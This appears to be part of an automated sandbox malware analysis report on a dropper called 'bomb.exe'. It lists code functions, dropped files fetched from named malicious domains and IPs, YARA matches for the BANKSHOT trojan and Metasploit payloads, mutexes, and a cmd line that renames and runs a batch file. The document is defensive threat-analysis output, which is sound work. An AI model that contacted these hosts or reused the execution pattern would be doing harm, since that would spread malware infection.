Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BD43E0	8_2_67BD43E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BF2320	8_2_67BF2320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C9C360	8_2_67C9C360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C16370	8_2_67C16370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC2370	8_2_67CC2370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B82370	8_2_67B82370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B88340	8_2_67B88340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67D062C0	8_2_67D062C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C522A0	8_2_67C522A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C4E2B0	8_2_67C4E2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C18250	8_2_67C18250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C08260	8_2_67C08260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C4A210	8_2_67C4A210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C58220	8_2_67C58220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B801E0	8_2_67B801E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BF6130	8_2_67BF6130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C64130	8_2_67C64130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE8140	8_2_67BE8140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B900B0	8_2_67B900B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B78090	8_2_67B78090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C5C0B0	8_2_67C5C0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C4C000	8_2_67C4C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BCE070	8_2_67BCE070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C48010	8_2_67C48010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B8EFB0	8_2_67B8EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C5EFF0	8_2_67C5EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B80FE0	8_2_67B80FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC8FB0	8_2_67CC8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B86F10	8_2_67B86F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C42F70	8_2_67C42F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC0F20	8_2_67CC0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BEEF40	8_2_67BEEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C20EC0	8_2_67C20EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C06E90	8_2_67C06E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B8AEC0	8_2_67B8AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C1EE70	8_2_67C1EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C60E20	8_2_67C60E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B84DB0	8_2_67B84DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67D0CDC0	8_2_67D0CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C16D90	8_2_67C16D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CAAD50	8_2_67CAAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C4ED70	8_2_67C4ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67D08D20	8_2_67D08D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BDECD0	8_2_67BDECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B7ECC0	8_2_67B7ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C46C00	8_2_67C46C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B8AC60	8_2_67B8AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C5AC30	8_2_67C5AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C86BE0	8_2_67C86BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C20BA0	8_2_67C20BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BFEA80	8_2_67BFEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C2EA00	8_2_67C2EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BFCA70	8_2_67BFCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C38A30	8_2_67C38A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C9C9E0	8_2_67C9C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BB49F0	8_2_67BB49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C109A0	8_2_67C109A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C3A9A0	8_2_67C3A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C409B0	8_2_67C409B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BD6900	8_2_67BD6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BB8960	8_2_67BB8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C868E0	8_2_67C868E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C54840	8_2_67C54840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BD0820	8_2_67BD0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C0A820	8_2_67C0A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC37C0	8_2_67CC37C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C0B7A0	8_2_67C0B7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BA3720	8_2_67BA3720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BED710	8_2_67BED710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C59720	8_2_67C59720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BB16A0	8_2_67BB16A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE96A0	8_2_67BE96A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BF7610	8_2_67BF7610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BA9600	8_2_67BA9600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B99650	8_2_67B99650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BD5640	8_2_67BD5640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BB9590	8_2_67BB9590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C055F0	8_2_67C055F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B95510	8_2_67B95510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE7500	8_2_67BE7500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CCF510	8_2_67CCF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B814E0	8_2_67B814E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67D014A0	8_2_67D014A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C0D410	8_2_67C0D410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C69430	8_2_67C69430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BF53E0	8_2_67BF53E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C21350	8_2_67C21350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67D09300	8_2_67D09300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BB5350	8_2_67BB5350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B8B2B0	8_2_67B8B2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C4F2F0	8_2_67C4F2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B852F0	8_2_67B852F0

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104E7 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 67BA9B10 appears 75 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 67BA3620 appears 63 times
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: String function: 00EE7B50 appears 51 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7112 -ip 7112

Source: http77.105.161.194pdffile.exe.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6998 bytes, 1 file, at 0x2c +A "tyr.vbs", ID 728, number 1, 1 datablock, 0x1503 compression
Source: httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe.0.dr	Static PE information: Number of sections : 12 > 10
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: Number of sections : 18 > 10
Source: httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe.0.dr	Static PE information: Number of sections : 12 > 10
Source: httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe.0.dr	Static PE information: Number of sections : 11 > 10

Source: http77.105.161.194pdffile.exe.exe.0.dr

Static PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST

Source: bomb.exe, 00000000.00000002.2651263420.0000013431234000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVirtualLibrary.exe@ vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.000001343175E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinRTNetMUAHostServer.exej% vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.000001343175E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVQP.exeX vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.00000134312BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVirtualLibrary.exe@ vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.00000134312BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePC Timer.exe< vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.00000134312BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYandexDiskSetup.exe8 vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.00000134312BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename1StepDVDCopy.exeB vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.00000134312BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePSPManager.exeZ vs bomb.exe
Source: bomb.exe, 00000000.00000002.2630257085.000001342DA54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSetup, vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.0000013431262000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLAPLINK.EXE: vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.0000013431262000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename1StepDVDCopy.exeB vs bomb.exe
Source: bomb.exe, 00000000.00000002.3119897301.000001344829E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSetup, vs bomb.exe
Source: bomb.exe, 00000000.00000002.3101483888.0000013447E9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVirtualLibrary.exe@ vs bomb.exe
Source: bomb.exe, 00000000.00000002.3095104666.0000013447E53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYandexDiskSetup.exe8 vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.0000013431394000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBlueSapphire_portable.exe0 vs bomb.exe
Source: bomb.exe, 00000000.00000002.3095104666.0000013447E20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePSPManager.exeZ vs bomb.exe
Source: bomb.exe, 00000000.00000002.3104876626.0000013447F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVQP.exeX vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.0000013431726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNotepad.exe0 vs bomb.exe
Source: bomb.exe, 00000000.00000002.2651263420.00000134312A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs bomb.exe

Source: 8.2.MSBuild.exe.43dcd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.MSBuild.exe.43f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.MSBuild.exe.43f8e0.1.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000031.00000002.3020983924.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000032.00000002.2952010686.000000C000648000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000031.00000002.3020983924.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe, type: DROPPED	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor

Source: httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.0.dr

Static PE information: Section: .data ZLIB complexity 0.9919421073717949

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@112/122@0/92

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_67BE0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

8_2_67BE0300

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,

4_2_00406F70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

8_2_004114A5

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_00406660 CoInitialize,CoCreateInstance,wsprintfW,wsprintfW,

4_2_00406660

Source: C:\Users\user\Desktop\bomb.exe

File created: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7112
Source: C:\Users\user\sysvplervcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\l9ll8dd6x
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\2f985c58743b38fb2171f673f820cbba
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6348:64:WilError_03

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe

File created: C:\Users\user\AppData\Local\Temp\323057790.exe

Jump to behavior

Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe

File opened: C:\Windows\system32\06349ec37f9d2d16d699279c0c20c150611a570faeb6b7c87f500c4796695eadAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat

Source: bomb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

